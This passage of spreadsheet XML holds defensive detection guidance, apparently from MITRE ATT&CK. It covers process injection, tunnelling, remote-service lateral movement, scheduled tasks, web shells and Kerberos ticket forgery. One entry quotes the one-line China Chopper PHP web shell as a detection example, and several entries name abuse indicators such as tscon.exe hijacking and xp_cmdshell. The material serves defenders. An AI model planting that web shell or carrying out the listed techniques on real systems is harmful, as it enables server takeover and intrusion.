    <t>Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Processing hollowing commonly involves spawning an otherwise benign victim process. Consider correlating detections of processes created in a suspended state (ex: through API flags or process’ thread metadata) with other malicious activity such as attempts to modify a process' memory, especially by its parent process, or other abnormal process behavior.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)(Citation: GNU Acct)(Citation: RHEL auditd)(Citation: Chokepoint preload rootkits) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. 
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).</t>
  </si>
  <si>
    <t>If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.
In context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers.  Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization.  Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted.  Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.</t>
  </si>
  <si>
    <t>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
Interaction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring.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t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for code artifacts associated with reflectively loading code, such as the abuse of .NET functions such as &lt;code&gt;Assembly.Load()&lt;/code&gt; and [Native API](https://attack.mitre.org/techniques/T1106) functions such as &lt;code&gt;CreateThread()&lt;/code&gt;, &lt;code&gt;memfd_create()&lt;/code&gt;, &lt;code&gt;execve()&lt;/code&gt;, and/or &lt;code&gt;execveat()&lt;/code&gt;.(Citation: 00sec Droppers)(Citation: S1 Old Rat New Tricks)
Monitor for artifacts of abnormal process execution. For example, a common signature related to reflective code loading on Windows is mechanisms related to the .NET Common Language Runtime (CLR) -- such as mscor.dll, mscoree.dll, and clr.dll -- loading into abnormal processes (such as notepad.exe). Similarly, AMSI / ETW traces can be used to identify signs of arbitrary code execution from within the memory of potentially compromised processes.(Citation: MDSec Detecting DOTNET)(Citation: Introducing Donut)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.
[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.</t>
  </si>
  <si>
    <t>Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
Monitor for processes and command-line arguments associated with hijacking service sessions.</t>
  </si>
  <si>
    <t>Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.
Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.</t>
  </si>
  <si>
    <t>Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. 
Use of applications such as ARD may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using these applications. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. 
In macOS, you can review logs for "screensharingd" and "Authentication" event messages. Monitor network connections regarding remote management (ports tcp:3283 and tcp:5900) and for remote login (port tcp:22).(Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)</t>
  </si>
  <si>
    <t>Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
Monitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).</t>
  </si>
  <si>
    <t>Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.</t>
  </si>
  <si>
    <t>Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
On macOS systems &lt;code&gt;log show --predicate 'process = "sshd"'&lt;/code&gt; can be used to review incoming SSH connection attempts for suspicious activity. The command &lt;code&gt;log show --info --predicate 'process = "ssh" or eventMessage contains "ssh"'&lt;/code&gt; can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
On Linux systems SSH activity can be found in the logs located in &lt;code&gt;/var/log/auth.log&lt;/code&gt; or &lt;code&gt;/var/log/secure&lt;/code&gt; depending on the distro you are using.</t>
  </si>
  <si>
    <t>Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
On macOS systems &lt;code&gt;log show --predicate 'process = "screensharingd" and eventMessage contains "Authentication:"'&lt;/code&gt; can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Monitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)</t>
  </si>
  <si>
    <t>Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior.  Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement) Also monitor for remote WMI connection attempts (typically over port 5985 when using HTTP and 5986 for HTTPS).</t>
  </si>
  <si>
    <t>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
Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information.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
Monitor for processes that can be used to discover remote systems, such as &lt;code&gt;ping.exe&lt;/code&gt; and &lt;code&gt;tracert.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.</t>
  </si>
  <si>
    <t>Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.</t>
  </si>
  <si>
    <t>Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an adversary or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)
Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)
Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)
Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.</t>
  </si>
  <si>
    <t>Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)</t>
  </si>
  <si>
    <t>Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. 
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
In Linux and macOS environments, monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. 
Review all jobs using the &lt;code&gt;atq&lt;/code&gt; command and ensure IP addresses stored in the &lt;code&gt;SSH_CONNECTION&lt;/code&gt; and &lt;code&gt;SSH_CLIENT&lt;/code&gt; variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in &lt;code&gt;/var/spool/cron/atjobs/&lt;/code&gt;.(Citation: rowland linux at 2019)
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [Command and Control](https://attack.mitre.org/tactics/TA0011), learning details about the environment through [Discovery](https://attack.mitre.org/tactics/TA0007), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008).</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.  
Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. </t>
  </si>
  <si>
    <t>Monitor process execution from the &lt;code&gt;svchost.exe&lt;/code&gt; in Windows 10 and the Windows Task Scheduler &lt;code&gt;taskeng.exe&lt;/code&gt; for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated
* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Systemd timer unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: &lt;code&gt;systemctl list-timers –all&lt;/code&gt;. Analyze the contents of corresponding &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.</t>
  </si>
  <si>
    <t>Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.</t>
  </si>
  <si>
    <t>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Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.</t>
  </si>
  <si>
    <t xml:space="preserve">Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.
Process monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) </t>
  </si>
  <si>
    <t>Monitor for creation and/or modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to &lt;code&gt;%windir%\system32\inetsrv\config\applicationhost.config&lt;/code&gt; could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)
Monitor execution and command-line arguments of &lt;code&gt;AppCmd.exe&lt;/code&gt;, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)</t>
  </si>
  <si>
    <t>On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.</t>
  </si>
  <si>
    <t>Monitor for changes to Registry keys associated with &lt;code&gt;ServiceDll&lt;/code&gt; and other subkey values under &lt;code&gt;HKLM\System\CurrentControlSet\services\TermService\Parameters\&lt;/code&gt;.
Monitor unexpected changes and/or interactions with &lt;code&gt;termsrv.dll&lt;/code&gt;, which is typically stored in &lt;code&gt;%SystemRoot%\System32\&lt;/code&gt;.
Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: &lt;code&gt;reg.exe&lt;/code&gt;) or modify/replace the legitimate &lt;code&gt;termsrv.dll&lt;/code&gt;.
Monitor module loads by the Terminal Services process (ex: &lt;code&gt;svchost.exe -k termsvcs&lt;/code&gt;) for unexpected DLLs (the default is &lt;code&gt;%SystemRoot%\System32\termsrv.dll&lt;/code&gt;, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).</t>
  </si>
  <si>
    <t>Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.</t>
  </si>
  <si>
    <t>Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) 
&lt;code&gt;&amp;lt;?php @eval($_POST['password']);&amp;gt;&lt;/code&gt;
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)
File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)
Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
Monitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to &lt;code&gt;%SystemRoot%&lt;/code&gt; and &lt;code&gt;%ProgramFiles%&lt;/code&gt; directories will protect against module loads from unsafe paths. 
Correlation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.</t>
  </si>
  <si>
    <t>Detection methods will vary depending on the type of third-party software or system and how it is typically used. 
The same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. 
Often these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.
Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</t>
  </si>
  <si>
    <t>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
Monitor processes and command-line arguments for actions that could be taken to gather system and network information.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t>
  </si>
  <si>
    <t>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
Monitor processes and command-line arguments for actions that could be taken to gather system and network information.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
In cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.</t>
  </si>
  <si>
    <t>If infrastructure or patterns in malware, tooling, certificates, or malicious web content have been previously identified, internet scanning may uncover when an adversary has staged their capabilities.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.</t>
  </si>
  <si>
    <t>If infrastructure or patterns in the malicious web content utilized to deliver a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) have been previously identified, internet scanning may uncover when an adversary has staged web content for use in a strategic web compromise.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious Link](https://attack.mitre.org/techniques/T1204/001).</t>
  </si>
  <si>
    <t>If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).</t>
  </si>
  <si>
    <t>If infrastructure or patterns in tooling have been previously identified, internet scanning may uncover when an adversary has staged tools to make them accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).</t>
  </si>
  <si>
    <t>Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
Security analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.
Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.</t>
  </si>
  <si>
    <t>Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)
Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)
Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
